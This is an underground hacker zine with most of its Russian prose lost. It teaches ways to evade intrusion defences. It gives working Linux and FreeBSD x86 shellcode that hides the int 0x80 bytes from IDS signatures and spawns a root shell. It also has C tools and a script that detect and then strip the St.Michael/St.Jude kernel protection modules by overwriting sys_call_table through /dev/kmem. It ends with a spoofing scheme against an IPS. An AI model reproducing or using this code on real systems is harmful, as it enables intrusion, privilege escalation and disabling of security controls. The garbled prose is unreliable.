..-----------------------------..
..       IDS  warez  bugz      ..
.._____________________________..


  C0nt3nt

   0x01    bypassing shellcodez detection
   0x02    lkm protection t00lz 0wnage (st.michael & st.jude)
   0x03    have fun with port-scanning detectorz / snifferz


 --[1]--  bypassing shellcodez detection


   ,  ,    RST    ids  
    .    -    ICWiener'   
   code_pimps     -   - 
     )),         . 
            0x90   \xcd\x80 (
   , ,     ).


   ,       -  
        .   %eax:

          incl %eax   // opcode 0x40
          decl %eax   // opcode 0x48
          ...
          xorl %eax,%eax
          bla-bla-bla

      -   ,      
   %eax.   ,   32-     ,   
        .      ,
            .    
         ebx,ecx,edx:

          // Single-byte inc/dec encodings (0x40-0x4f) usable as filler
          // instead of the 0x90 nop.  Caveat: this is i386-only -- in
          // 64-bit mode the bytes 0x40-0x4f are REX prefixes, not inc/dec,
          // so the same padding changes the meaning of the next instruction.
          incl %ebx   // opcode 0x43
          decl %ebx   // opcode 0x4b
          incl %ecx   // opcode 0x41
          decl %ecx   // opcode 0x49
          incl %edx   // opcode 0x42
          decl %edx   // opcode 0x4a


       -   80h.      ""
    :   0x80cd ( byte order,  x86   
   little endian)     .      , 
       call. ,    linux/x86:

   ## Linux/i386, GAS (AT&T) syntax.  Every system call goes through a
   ## 4-byte trampoline that is built on the stack at run time:
    #
    #   clc          (0xf8 -- a harmless one-byte filler)
    #   int $0x80    (0xcd 0x80)
    #   ret          (0xc3)
    #
    # The two pushw immediates below are $0xc380 and $0xcdf8; with x86
    # little-endian byte order the stack then reads f8 cd 80 c3.  The bytes
    # cd 80 therefore never appear contiguously in the payload itself.
    # The `ret` consumes the return address pushed by `call *(%esi)`.
    #
    # Requires an executable stack (the trampoline is executed from it) and
    # a 32-bit process (int $0x80 register ABI, 4-byte pushes).
   ##

     pushw $0xc380          # bytes 80 c3 (upper half of the trampoline)
     pushw $0xcdf8          # bytes f8 cd -> stack: f8 cd 80 c3
     movl %esp, %eax        # %eax = address of the trampoline
     pushl %eax             # store that address in a stack slot
     movl %esp, %esi  # %esi -> slot holding the trampoline address; live for the whole payload

   ##  chroot("//")  -- %eax = 61, %ebx -> "//" followed by the zero dword pushed first  ##
   ##  (why chroot is done before setuid is not explained in the visible text)
     xorl %eax,%eax
     push %eax
     pushw $0x2f2f
     movl %esp,%ebx
     mov $61, %al
     call *(%esi)     # indirect call -> clc; int $0x80; ret

   ##  setuid(0)  -- %eax = 23, %ebx = 0  ##
     xorl %eax,%eax         # %eax holds the previous syscall's return value; clear it
     xorl %ebx,%ebx
     mov $23, %al
     call *(%esi)

   ##  execve("//bin/sh", ["//bin/sh", NULL], NULL)  -- %eax = 11  ##
     xorl %eax,%eax
     xorl %edx,%edx         # %edx = envp = NULL (also reused as the argv terminator)
     push %eax              # NUL terminator for the path string
     pushl $0x68732f6e      # "n/sh"
     pushl $0x69622f2f      # "//bi" -> %esp points at "//bin/sh\0"
     movl %esp, %ebx        # %ebx = path
     pushl %edx             # argv[1] = NULL
     pushl %ebx             # argv[0] = path
     movl %esp,%ecx         # %ecx = argv
     movb $11,%al
     call *(%esi)


         ascii:

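  /* Linux/x86 shellcode -- 59 bytes, no NUL bytes.
   *
   * Assembled form of the GAS listing above, wrapped in a definition so the
   * claimed size is checkable.  One byte is corrected: the second pushw
   * immediate is $0xcdf8 (clc; int $0x80), exactly as in the assembly source
   * and in the FreeBSD listing.  The earlier copy had $0xcd90 (nop; int $0x80)
   * -- functionally equivalent, but 0x90 is one of the two byte patterns the
   * intro names as what the detectors key on, so there is no reason to put
   * it back into the payload.
   *
   * Why a byte signature misses it: the trampoline f8 cd 80 c3 exists only
   * on the stack at run time; in the payload "\xcd" is followed by "\x89",
   * never by "\x80".  Every syscall is reached via call *(%esi).
   * Needs an executable stack; 32-bit (int $0x80) only.
   */
  static const char linux_x86_shellcode[] =

  /* init int_0x80 code in stack and pointer */

   "\x66\x68\x80\xc3"      //  pushw  $0xc380
   "\x66\x68\xf8\xcd"      //  pushw  $0xcdf8   (was "\x90\xcd" = $0xcd90)
   "\x89\xe0"              //  movl   %esp,%eax
   "\x50"                  //  push   %eax
   "\x89\xe6"              //  movl   %esp,%esi

  /* chroot("//") */

   "\x31\xc0"              //  xorl   %eax,%eax
   "\x50"                  //  push   %eax
   "\x66\x68\x2f\x2f"      //  pushw  $0x2f2f
   "\x89\xe3"              //  movl   %esp,%ebx
   "\xb0\x3d"              //  mov    $0x3d,%al     (61 = chroot)
   "\xff\x16"              //  call   *(%esi)

  /* setuid(0) */

   "\x31\xc0"              //  xorl   %eax,%eax
   "\x31\xdb"              //  xorl   %ebx,%ebx
   "\xb0\x17"              //  mov    $0x17,%al     (23 = setuid)
   "\xff\x16"              //  call   *(%esi)

  /* execve("//bin/sh", {"//bin/sh", NULL}, NULL) */

   "\x31\xc0"              //  xorl   %eax,%eax
   "\x31\xd2"              //  xorl   %edx,%edx
   "\x50"                  //  push   %eax
   "\x68\x6e\x2f\x73\x68"  //  push   $0x68732f6e   "n/sh"
   "\x68\x2f\x2f\x62\x69"  //  push   $0x69622f2f   "//bi"
   "\x89\xe3"              //  movl   %esp,%ebx
   "\x52"                  //  push   %edx
   "\x53"                  //  push   %ebx
   "\x89\xe1"              //  movl   %esp,%ecx
   "\xb0\x0b"              //  mov    $0xb,%al      (11 = execve)
   "\xff\x16"              //  call   *(%esi)
  ;

  /* total 59 bytes (sizeof linux_x86_shellcode == 60 with the terminating NUL) */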


    BSD-  :

   ##  FreeBSD/i386, GAS (AT&T) syntax.  Same stack-built trampoline as the
   ##  Linux version (pushw $0xc380 / $0xcdf8 -> f8 cd 80 c3 = clc; int $0x80;
   ##  ret), so cd 80 is never contiguous in the payload.  Needs an
   ##  executable stack; 32-bit only.
   ##
   ##  BSD passes syscall arguments on the stack.  %eax is left at 0 for both
   ##  calls below, i.e. they rely on FreeBSD's indirect syscall entry
   ##  (number 0), which takes the real syscall number as its first stack
   ##  argument.  The return address pushed by `call *(%edx)` occupies the
   ##  slot the BSD convention expects the kernel to skip.  Pushed arguments
   ##  are never popped; not needed for a payload this short.
     pushw $0xc380
     pushw $0xcdf8
     movl %esp,%eax
     pushl %eax
     movl %esp,%edx  # %edx -> slot holding the trampoline address
                     # (the Linux version keeps it in %esi; the original
                     # note about %ebx/%ecx/%edx did not survive in this copy)

   ##  setuid(0)  ==  syscall(23, 0)  ##
     xorl %eax,%eax
     pushl %eax             # uid = 0
     pushl $23              # SYS_setuid, consumed by the indirect syscall entry
     call *(%edx)  # pushes the return address = the dummy slot BSD expects
                   # (the original comment here mentioned %esi and FreeBSD;
                   # its text is lost in this copy)

   ##  execve("//bin/sh", ["//bin/sh", NULL], NULL)  ==  syscall(59, ...)  ##
     xor %eax,%eax          # %eax holds the previous syscall's return; clear it
     pushl %eax             # NUL terminator for the path string
     pushl $0x68732f6e      # "n/sh"
     pushl $0x69622f2f      # "//bi" -> %esp points at "//bin/sh\0"
     movl %esp,%ebx         # %ebx = path
     pushl %eax             # argv[1] = NULL
     pushl %ebx             # argv[0] = path
     movl %esp,%ecx         # %ecx = argv
     pushl %eax             # envp = NULL
     pushl %ecx             # argv
     pushl %ebx             # path
     pushl $59              # SYS_execve
     call *(%edx)


   , ,    ascii:

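  /* FreeBSD/x86 shellcode -- 46 bytes, no NUL bytes.
   *
   * Assembled form of the BSD listing above, wrapped in a definition so the
   * claimed size is checkable (sizeof == 47 with the terminating NUL).
   * Same stack-built trampoline f8 cd 80 c3 (clc; int $0x80; ret) as the
   * Linux version, with the pointer kept in %edx; "\xcd\x80" never appears
   * contiguously in the payload.  %eax stays 0 at both calls, so both go
   * through FreeBSD's indirect syscall entry (number 0) with the real
   * number as the first stack argument; the return address pushed by
   * call *(%edx) fills the slot the BSD convention expects the kernel to
   * skip.  Needs an executable stack; 32-bit only.
   */
  static const char freebsd_x86_shellcode[] =

  /* init int_0x80 code in stack and pointer */

   "\x66\x68\x80\xc3"      // pushw  $0xc380
   "\x66\x68\xf8\xcd"      // pushw  $0xcdf8
   "\x89\xe0"              // movl   %esp,%eax
   "\x50"                  // pushl  %eax
   "\x89\xe2"              // movl   %esp,%edx

  /* setuid(0) == syscall(23, 0) */

   "\x31\xc0"              // xorl   %eax,%eax
   "\x50"                  // pushl  %eax
   "\x6a\x17"              // pushl  $0x17        (23 = setuid)
   "\xff\x12"              // call   *(%edx)

  /* execve("//bin/sh", {"//bin/sh", NULL}, NULL) == syscall(59, ...) */

   "\x31\xc0"              // xorl   %eax,%eax
   "\x50"                  // pushl  %eax
   "\x68\x6e\x2f\x73\x68"  // pushl  $0x68732f6e  "n/sh"
   "\x68\x2f\x2f\x62\x69"  // pushl  $0x69622f2f  "//bi"
   "\x89\xe3"              // movl   %esp,%ebx
   "\x50"                  // pushl  %eax
   "\x53"                  // pushl  %ebx
   "\x89\xe1"              // movl   %esp,%ecx
   "\x50"                  // pushl  %eax
   "\x51"                  // pushl  %ecx
   "\x53"                  // pushl  %ebx
   "\x6a\x3b"              // pushl  $0x3b        (59 = execve)
   "\xff\x12"              // call   *(%edx)
  ;

  /* total 46 bytes (sizeof freebsd_x86_shellcode == 47 with the terminating NUL) */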




 --[2]--  lkm protection t00lz 0wnage (st.michael & st.jude)


        ,   lkm-.   
              -  St.Michael,
          sys_call_table,   St.Jude,
            .    
   ,   Timothy Lalwess'a    )


    ,       ,       
     .   ,    :

   /*  StMichael_lkm.c */

     /* Excerpt from StMichael_lkm.c (the enclosing function, presumably the
      * module's init path, is not shown).  Step 1: save the original
      * sys_call_table entries.  Note the "(void *) lvalue = ..." form --
      * cast-as-lvalue, an old GCC extension, not standard C. */
     (void *) orig_init_module = sys_call_table[__NR_init_module];
     (void *) orig_delete_module = sys_call_table[__NR_delete_module];
     (void *) orig_exit = sys_call_table[__NR_exit];
     (void *) orig_create_module = sys_call_table[__NR_create_module];

 #if defined(FSCHECK) || defined(ROKMEM) || defined(REALLY_IMMUTABLE)
     /* open/close originals are saved only under these build options;
      * whether they are also replaced in the table is outside this excerpt. */
     (void *) sm_open = sys_call_table[__NR_open];
     (void *) sm_close = sys_call_table[__NR_close];
 #endif

     /* saved but not replaced in this excerpt */
     (void *) syscall_reboot = sys_call_table[__NR_reboot];
     (void *) syscall_sync = sys_call_table[__NR_sync];

     /* Step 2: install the wrappers.  These four slots are exactly what the
      * detector/remover below compare against System.map; St.Michael's own
      * saved copies (orig_*, syscall_*) are not touched by restoring them. */
     sys_call_table[__NR_init_module] = (void *) sm_init_module;
     sys_call_table[__NR_delete_module] = (void *) sm_delete_module;
     sys_call_table[__NR_create_module] = (void *) sm_create_module;
     sys_call_table[__NR_exit] = (void *) sm_exit;


        ,      
      lkm.    /dev/kmem   :   
          , ..    
        /dev/kmem,    -    ,  
     .  St.Jude, ,      St.Michael   
    init_module/etc        :

 /*
    fuck_stz.c

     St.Michael or St.Jude detector

     (c) russian underground community
 */

 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
 #include <unistd.h>
 #include <fcntl.h>
 #include <sys/types.h>
 #include <sys/stat.h>
 #include <asm/unistd.h>

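 /*
  * hexval - value of one hex digit, or -1 if c is not a hex digit.
  * The original accepted only '0'-'9' and 'a'-'f' (System.map is lowercase);
  * uppercase is accepted here as well.
  */
 static int hexval(char c)
 {
   if (c >= '0' && c <= '9') return c - '0';
   if (c >= 'a' && c <= 'f') return c - 'a' + 10;
   if (c >= 'A' && c <= 'F') return c - 'A' + 10;
   return -1;
 }

 /*
  * ma_atol - parse the first 8 characters of p as a big-endian 32-bit hex
  * address (the first column of an i386 System.map line, e.g. "c0227240").
  *
  * Exactly p[0..7] are read; no terminator is required, so a 9-byte
  * "xxxxxxxx\n" config record can be passed as-is.
  *
  * Fix: a character that is not a hex digit now contributes 0.  The
  * original left its per-byte accumulator uninitialised / stale in that
  * case (its if-chains had no fallback), so a malformed record produced a
  * garbage address rather than a predictable one.
  */
 unsigned long ma_atol(char *p)
 {
   unsigned long res = 0;
   int i;

   for (i = 0; i < 8; i++){
     int d = hexval(p[i]);
     res = (res << 4) | (unsigned long)(d < 0 ? 0 : d);
   }

   return res;
 }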


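 /*
  * Detector: compare one live sys_call_table slot (read through /dev/kmem)
  * with the address System.map gives for the same handler.  A mismatch
  * means something redirected that syscall -- St.Michael/St.Jude replace
  * init_module, delete_module, create_module and exit (see the
  * StMichael_lkm.c excerpt above).
  *
  * Usage: <prog> <syscall number>
  *
  * /tmp/conf must hold two 9-byte records (8 hex digits + newline):
  *   line 1 = address of sys_call_table
  *   line 2 = address of the handler expected in slot <syscall number>
  *
  * Caveats:
  *  - 32-bit only: the slot is located at sct + nr * 4 and read as 4 bytes.
  *  - The verdict is only as good as System.map; a map from a different
  *    kernel build gives a false "hooked" (or a false "ok").
  *  - /tmp is world-writable and this runs as root: anyone who can create
  *    /tmp/conf first chooses the expected address, i.e. the verdict.
  *
  * Fixes vs. the original: the stray quote in `exit(1)'` (did not compile),
  * unchecked read/lseek/chdir results, `%x` used with a long, and the
  * 4-byte kmem read landing in a long (upper bytes were never initialised).
  */
 int main( int argc, char *argv[])
 {
   int fd, kmem, nr;
   unsigned long expected, sct;
   unsigned int live = 0;          /* 4-byte table slot as read from kmem */
   char rec[9];                    /* conf file record line */

   if (argc < 2){
     printf("Usage: %s sys_call_num \n",argv[0]);
     exit(1);
   }

   nr = atoi(argv[1]);
   if (nr < 0){
     printf("[-] bad syscall number\n");
     exit(1);
   }

   fd = open("/tmp/conf",O_RDONLY);

   if (fd < 0){
     printf("[-] cant open /tmp/conf!\n");
     exit(1);
   }

   /* Opened as "./kmem" after chdir("/dev") rather than as "/dev/kmem".
    * Presumably to dodge a path-string check in a hooked open() (St.Michael
    * saves open/close under FSCHECK/ROKMEM/REALLY_IMMUTABLE) -- confirm
    * against the protection module's source.  If the chdir fails, "./kmem"
    * would be whatever sits in the current directory, so it is checked. */
   if (chdir("/dev") < 0){
     printf("[-] cant chdir to /dev!\n");
     close(fd);
     exit(1);
   }
   kmem = open("./kmem", O_RDONLY);

   if (kmem < 0){
     printf("[-] cant read /dev/kmem! Maybe St.Michael/Jude blocks j00?\n");
     close(fd);
     exit(1);
   }

   if (read(fd, rec, 9) != 9){
     printf("[-] short read on /tmp/conf (sys_call_table line)\n");
     goto fail;
   }
   sct = ma_atol(rec);
   printf("get addr of sys_call_table %lx\n",sct);

   if (read(fd, rec, 9) != 9){
     printf("[-] short read on /tmp/conf (handler line)\n");
     goto fail;
   }
   expected = ma_atol(rec);

   if (lseek(kmem, (off_t)(sct + (unsigned long)nr * 4), SEEK_SET) == (off_t)-1 ||
       read(kmem, &live, 4) != 4){
     printf("[-] cant read sys_call_table[%d] from /dev/kmem\n", nr);
     goto fail;
   }

   if ((unsigned int)expected != live) printf("St.Michael or St.Jude in system!\n");
   else printf("Everythin' is ok!\n");

   close(kmem);
   close(fd);
   exit(0);

 fail:
   close(kmem);
   close(fd);
   exit(1);
 }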


       :

    satanix~># pwd
    /tmp

    satanix~># cat /boot/System.map | grep -a " sys_call"
    c0227240 D sys_call_table

    satanix~># echo c0227240 > ./conf
    satanix~># cat /boot/System.map | grep -a "T init_modules"
    c0244420 T init_modules

    satanix~># echo c0244420 >> ./conf
    satanix~># gcc -o fuckem fuck_stz.c
    satanix~># cat /usr/include/asm/unistd.h | grep init_mod
    #define __NR_init_module	128

    satanix~># ./fuckem 128
    St.Michael or St.Jude in system!

    satanix~>#

       )) ,  ,    
     st- :     sys_call_table,  
     -    ,            
   System.map.    :


 /*
               !!! St.Michael / St.Jude remover !!!

  St.Michael wraps these syscalls:

   init_module
   delete_module
   create_module
   exit

  St.Jude also wraps these:

   init_module
   delete_module
   create_module
   exit

   fork
   vfork
   clone
   setuid
   setreuid
   execve


   (c) russian underground community
 */

 #include <stdio.h>
 #include <unistd.h>
 #include <fcntl.h>
 #include <sys/types.h>
 #include <sys/stat.h>
 #include <asm/unistd.h>

 #include "ma_atol.h"


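 /*
  * Remover: write the System.map addresses back into sys_call_table through
  * /dev/kmem, undoing the wrappers St.Michael (mode 1) or St.Jude (mode 2)
  * installed.  Slots are processed in the fixed order of st_hooks[] below,
  * which must match the line order of /tmp/conf (the config generator
  * script writes them in exactly that order).
  *
  * Usage: <prog> 1   -- St.Michael: init_module, delete_module,
  *                      create_module, exit
  *        <prog> 2   -- St.Jude: the four above plus fork, vfork, clone,
  *                      setuid, setreuid, execve
  *
  * /tmp/conf: one 9-byte record per line (8 hex digits + '\n');
  * line 1 = sys_call_table, then one line per hook in st_hooks[] order.
  *
  * Caveats -- this writes raw pointers into the running kernel:
  *  - System.map MUST be the map of the running kernel.  A stale map puts
  *    garbage into the syscall table and the box will most likely oops.
  *  - /tmp/conf lives in a world-writable directory and is consumed by a
  *    root process with no integrity check: whoever creates /tmp/conf first
  *    chooses what gets written into sys_call_table.
  *  - Restoring the table does not unload the protection module or touch the
  *    copies it keeps elsewhere (the StMichael_lkm.c excerpt above also saves
  *    reboot/sync/open/close pointers); only the listed slots change.
  *  - 32-bit only: slots are nr * 4 bytes apart and 4 bytes wide.
  *  - The run aborts at the first slot that cannot be read or written and
  *    says so, rather than silently leaving a half-restored table.
  *
  * Fixes vs. the original: ten copy-pasted check/fix blocks folded into
  * restore_slot(); read/lseek/write/chdir results checked; `%x` with an
  * unsigned long replaced; the 4-byte kmem read no longer lands in an
  * unsigned long whose upper bytes were never initialised.
  */

 struct st_hook {
   int nr;             /* syscall number = index into sys_call_table */
   const char *name;   /* label used in progress messages */
 };

 /* The first ST_MICHAEL_HOOKS entries are St.Michael's; St.Jude adds the rest. */
 static const struct st_hook st_hooks[] = {
   { __NR_init_module,   "init_module"   },
   { __NR_delete_module, "delete_module" },
   { __NR_create_module, "create_module" },
   { __NR_exit,          "sys_exit"      },
   { __NR_fork,          "fork"          },
   { __NR_vfork,         "vfork"         },
   { __NR_clone,         "clone"         },
   { __NR_setuid,        "setuid"        },
   { __NR_setreuid,      "setreuid"      },
   { __NR_execve,        "execve"        },
 };
 #define ST_MICHAEL_HOOKS 4u
 #define ST_JUDE_HOOKS    ((unsigned int)(sizeof st_hooks / sizeof st_hooks[0]))

 /*
  * restore_slot - consume the next 9-byte record from fd (the expected
  * handler address), compare it with the live 4-byte entry at
  * sys_call_table[h->nr], and write the expected value back if they differ.
  *
  * Returns 0 on success (including "nothing to do"), -1 after printing a
  * message if the record, the seek, the read or the write failed.
  */
 static int restore_slot(int fd, int kmem, unsigned long sct, const struct st_hook *h)
 {
   char rec[9];
   unsigned long orig;
   unsigned int cur = 0, val;
   off_t off = (off_t)(sct + (unsigned long)h->nr * 4);

   if (read(fd, rec, 9) != 9){
     printf("[-] short read on /tmp/conf for %s()\n", h->name);
     return -1;
   }
   orig = ma_atol(rec);

   if (lseek(kmem, off, SEEK_SET) == (off_t)-1 || read(kmem, &cur, 4) != 4){
     printf("[-] cant read sys_call_table[%d] (%s) from /dev/kmem\n", h->nr, h->name);
     return -1;
   }

   val = (unsigned int)orig;
   if (val == cur)
     return 0;

   if (lseek(kmem, off, SEEK_SET) == (off_t)-1 || write(kmem, &val, 4) != 4){
     printf("[-] cant write sys_call_table[%d] (%s)\n", h->nr, h->name);
     return -1;
   }
   printf("[+] %s() addr fixed succesfully (%x from %x)!\n", h->name, val, cur);
   return 0;
 }

 int main( int argc, char *argv[])
 {
   int fd, kmem, mode;
   unsigned int nhooks, i;
   unsigned long sct;
   char rec[9]; // conf file record line

   if (argc < 2){
     printf("Usage: %s type \n types: \n  1\t\t St.Michael\n  2\t\t St.Jude\n",
       argv[0]);
     exit(1);
   }

   mode = atoi(argv[1]);

   if (mode != 1 && mode != 2){
     printf("bad mode\n");
     exit(1);
   }
   nhooks = (mode == 1) ? ST_MICHAEL_HOOKS : ST_JUDE_HOOKS;

   fd = open("/tmp/conf",O_RDONLY);

   if (fd < 0){
     printf("cant open /tmp/conf!\n");
     exit(1);
   }

   /* "./kmem" after chdir("/dev") rather than "/dev/kmem": presumably to
    * dodge a path-string check in a hooked open() -- confirm against the
    * protection module's source.  The chdir is checked because on failure
    * "./kmem" would name a file in the current directory instead. */
   if (chdir("/dev") < 0){
     printf("[-] cant chdir to /dev!\n");
     close(fd);
     exit(1);
   }

   kmem = open("./kmem", O_RDWR);

   if (kmem < 0){
     printf("[-] can't access to /dev/kmem! Some asshole blocks you\n");
     close(fd);
     exit(1);
   }

   if (read(fd, rec, 9) != 9){
     printf("[-] short read on /tmp/conf (sys_call_table line)\n");
     close(kmem);
     close(fd);
     exit(1);
   }
   sct = ma_atol(rec);
   printf("get addr of sys_call_table %lx\n",sct);

   for (i = 0; i < nhooks; i++){
     if (restore_slot(fd, kmem, sct, &st_hooks[i]) < 0){
       printf("[-] aborting; sys_call_table may be only partially restored\n");
       close(kmem);
       close(fd);
       exit(1);
     }
   }

   if (mode == 1)
     printf("done!\n");
   else
     printf("well done!\n");

   close(kmem);
   close(fd);
   exit(0);
 }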


       :

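 #!/bin/sh
 #
 # Build /tmp/conf for the detector / remover above: one line per entry,
 # each the 8-hex-digit address of a kernel symbol taken from the first
 # column of System.map, in exactly the order the C programs read them:
 #
 #   sys_call_table, sys_init_module, sys_delete_module, sys_create_module,
 #   sys_exit, sys_fork, sys_vfork, sys_clone, <setuid>, <setreuid>, sys_execve
 #
 # Fixes vs. the original:
 #  - symbols are matched exactly on the name column instead of by substring
 #    (e.g. `grep sys_setuid` matched both sys_setuid and sys_setuid16 and
 #    `head -1` silently picked one);
 #  - /tmp/conf is overwritten, not appended to: the old `>>conf` left any
 #    stale lines (e.g. from the manual `echo ... > ./conf` run) at the top,
 #    and the C programs read the first lines;
 #  - a missing symbol aborts instead of producing a short, mis-aligned file.
 #
 # Caveats (read before running the remover as root):
 #  - System.map MUST belong to the running kernel; the remover writes these
 #    addresses straight into sys_call_table via /dev/kmem.
 #  - /tmp is world-writable and the config is consumed by a root process.
 #    The symlink check below is still racy; a private directory is better.
 #  - setuid/setreuid: the remover indexes the table with __NR_setuid and
 #    __NR_setreuid.  On i386 kernels of this era those slots may be served
 #    by the 16-bit variants sys_setuid16 / sys_setreuid16 rather than by
 #    sys_setuid / sys_setreuid (the original comment said as much).  Set
 #    SETUID_SYM / SETREUID_SYM to the symbol your kernel actually uses.

 SYSMAP=${SYSMAP:-/boot/System.map}
 CONF=/tmp/conf
 TMP=$CONF.0
 SETUID_SYM=${SETUID_SYM:-sys_setuid}        # or sys_setuid16
 SETREUID_SYM=${SETREUID_SYM:-sys_setreuid}  # or sys_setreuid16

 # sym_addr NAME: print the address of the symbol whose name column ($3)
 # equals NAME exactly; exit 1 if it is not in the map.
 sym_addr() {
     awk -v s="$1" '$3 == s { print $1; found = 1; exit }
                    END { if (!found) exit 1 }' "$SYSMAP"
 }

 if [ ! -r "$SYSMAP" ]; then
     echo "cant read $SYSMAP" >&2
     exit 1
 fi

 # refuse to write through a link somebody else planted in /tmp
 if [ -L "$TMP" ] || [ -L "$CONF" ]; then
     echo "$TMP or $CONF is a symlink, refusing" >&2
     exit 1
 fi

 : > "$TMP" || exit 1

 for sym in sys_call_table sys_init_module sys_delete_module sys_create_module \
            sys_exit sys_fork sys_vfork sys_clone \
            "$SETUID_SYM" "$SETREUID_SYM" sys_execve
 do
     if ! sym_addr "$sym" >> "$TMP"; then
         echo "symbol $sym not found in $SYSMAP" >&2
         rm -f "$TMP"
         exit 1
     fi
 done

 mv "$TMP" "$CONF" || exit 1
 echo "config generation done!"
 # _eof_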

    ,    St.Jude   ,     
           .   
    ,  - .   ,     
      ;P    ?




 --[3]--  have fun with port-scanning detectorz / snifferz


            .  
         ,     
    -  (     -   )).     
    ?


   1.     - IPS  (Intrusion  Prevention System),
      ,   ,       ,
       ,    ,     ascii-
   .              
      IPS  - .


   2.    -   IPS   
     .     ?  
      ))         
     , ..    (    
          ),       
      =)


     phase 1.
                         6.6.6.13
                      host X  (attacker)
                  .//'
                 .//'
                .//'    c  B
               .//'
               1/
          host A                                host B
        (here IPS)                       (old rsh-server, trusted host 13.6.6.6)
         13.6.6.6                               13.0.0.7


     phase 2.

                       6.6.6.13
                     host X (attacker)
                                    '\\.
                                     '\\.  start spoofing
                                      '\\.
                                       '\\.       ( src_ip: 13.6.6.6 )
                                         \1
          host A      reply packets     host B
        (here IPS)  <============== (old rsh-server)
         13.6.6.6                       13.0.0.7

     
         
       .


.e.o.f.

